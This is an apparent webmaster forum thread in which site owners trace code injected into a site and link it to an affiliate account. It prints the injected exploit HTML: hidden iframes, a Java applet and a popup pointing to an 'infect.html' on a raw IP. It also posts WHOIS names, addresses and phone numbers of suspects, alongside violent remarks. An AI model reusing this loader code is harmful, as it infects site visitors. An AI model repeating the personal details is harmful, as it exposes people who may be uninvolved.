Reward to who ever can find out more about this fuckface
 

DONT CLICK ON THE LINK ITS FULL OF POPUPS AND SPYWARE

http://www.tracktraff.cc/cnt/processor?reddevil

That code has appeared 3 times now on a mgp that i run with a freind of mine, he took away the atx code and replaced it with his
and is right now hitboting the shit out of the site with aprox 10-20k per hour of shit hits with a 6% prod :321GFY

Our tech at extremerack showed us the logs nobody has edited the site exept them

and atx dev didn't fix yet the ip section of the script so we cant really do anything there

and in comus there is only 2 ips mine and my freinds so he dident change it from there

so after changing all passes 2 times he still managed to place the code back on the site 2 times :321GFY

so how the fuck is he doing it?

i need to know who the fuck runs that shit a ip a adress or whatever
and a reward will be yours for it
so if anybody knows that reff or anything please contact me on icq
at 339264329

Thanks for the info.

Np be aware of this fucker
he will fuck your site up totaly

these types of fuckers really ruin it for everybody else

probably Russian.. fuckin douchebag

call out aff and get them to tell you exactly who it is..

http://iframe.adultfriendfinder.com/...frame.jsp?Pid=p35541

did you find that code on that page mate??

Not saying he is guilty but

a-137.com

Tyshawn Riddles ()
Salcedo St. 35 93
CHARLOTTE
NC,28245
US
Tel. +1.7048365653

yes its exploits on the page he runs them off his own server so its not a hack.

<iframe src='http://195.225.177.27/cb30a1fc/counter.gif' frameborder='0' width='1' height='1' scrolling='no'></iframe>
<APPLET ARCHIVE="archive.jar" codebase="http://195.225.177.27/cb30a1fc/" CODE="BlackBox.class" WIDTH=1 HEIGHT=1><param name="fontName" value="cb30a1fc"></APPLET>
<object data="/cb30a1fc/go.php"></object>
<iframe src='http://195.225.177.27/cb30a1fc/test.php' frameborder='0' width='1' height='1' scrolling='no' name=counter></iframe>
<script>
window.open("http://195.225.177.27/cb30a1fc/infect.html","_blank","left=5000");
</script>
<center>
<iframe
src="http://iframe.adultfriendfinder.com/promo/affiframe.jsp?Pid=p35541&BGColor=99CCFF&TextColor= 000000&LinkColor=0000ff&Num=3" scrolling="No" align="MIDDLE" width="700" height="320"
frameborder="No"></iframe>

same aff code is found on the above page

very nicely done will contact them asap and see what they can thell me

I cant see any legit reason to run spyware on a page along with aff code . And because the exploits are on the same server i dont think its possible he was hacked ( because thats always a possibility )

Like sometimes a site is hacked and injected with an exploit , but it turns out the person doesnt know , and he may try to use this as an excuse , but i wouldnt buy it , the exploits are pointed back to his own server not an external one , so unless the hacker exploited the site and installed several directories and exploits , then its that guy.

The Russians Are Coming, The Russians Are Coming
 

Just read this thread. OMG, the Russians have landed in Charlotte, NC...

LAUNCH ALL MISSILES!!!

BTW, what's Smokey The Bear's reward?

ADG Webmaster

oh yea, email at the bottem says [email protected]

Heres an interesting link for you.

http://www.ustreas.gov/usss/forms/form_ssf4017.pdf

Send him a copy of that filled out with all his info.

Then make him recoup the damage he cost.

Heh good bears dont need rewards :) Thanks for the help though..

Yeah odds are its not a U.S. or Canadian webmaster.

He seems american.. The domain is owned by an american.. The html seems american, his sites seem made by an american. * could be wrong though

Then again..

Domain Name: RUNSEARCH.COM
Administrative Contact:
Jordan Anrew [email protected]
PO BOX 2014
Novomoskovsk Ru -
RU
7.5017000206

LOL this guy should be shot , he has a long history of this..

http://bbs.adultwebmasterinfo.com/sh...threadid=56578


and cool web search trojans..

http://www.webhelper4u.com/CWS/cwswhoisinfo.html

WOw thats like D. Stodgil Territory, if its him HOLY SHIT, there will be some deep south beating for real. :warning :warning :warning

Administrative Contact:
Medvedeva, Ioulia [email protected]
8130 SW Beaverton-Hillsdale
Portland, OR 97225
US
8666400126

well the one thing in common with all the pages is they ALL have the same adultfriendfinder code , and it has been up for at least a few paychecks , so they know EXACTLY who he is.. they have reps on gfy hopefuly they see this.

AFF is good folks to, they will nuke em.

There is 3 viruses and 2 trojans throughout this code.

Make sure you are up to date virus wise when checking into this.

Hey Crackerboy ... I never heard back from you regarding what we were talking about last week ... Please let me know how things are going. Thanks!

FF

Smokey I am coming up with all your findings ... in reference to it being D. Stoghill I don't think that scammer is smart enough for this.

I could be wrong though. This just isn't his M.O.

Thanks for the warning.

btw i called that number its not in service..

Yeah I been doing reverse lookups here in North Carolina seems like that phone has been out of commision for some time.

I Love A Good Mystery...
 

Seriously, it's messed up that people deliberately and malisciously do stuff like that.

I signed up to GFY awhile back, but I've only recently begun participating. Some of the BS, drama, and superfluous nonsense I can live without, however I am impressed at the readiness of people to come to the aid of other's and lend their skills when it's requested.

Bravo Zulu for that! :thumbsup

Let us know when you bring the redneck/Russian (or maybe it's a redneck Russian) to justice.

ADG Webmaster

hmm this guy is slick , has good domains too http://www.hotbookmark.com/

AEBN aff # = AEBN007969

searchv.com

Ifriends aff = extron

hmm this domain might also be part of it

BEDROOMFUCK.NET dont know what directnic is on that for

and
midnightporn.net

im getting askjolene popups also on some domains

http://search.askjolene.com/search?q...ia=pic&aid=955

edit , its http://www.fpcTraffic2.com/raw/click...omaven&track=A popup that uses askjolene sorry

duplicate askjolene accounts
955 & 956

That's Directnic's standard parking page once you enter. The warning entry page is automatic because the domain has "fuck" in it and the Directnic parking page has explicit links on it. This would be a domain that has never had an index page uploaded.

Smokey, could you please hit John up on ICQ: 8 8 9 5 7 1 6 0 or support 'at' fetish-video-cash.com

Would like to ask you something if possible?

Thanks :)

Thanks for warning us pal.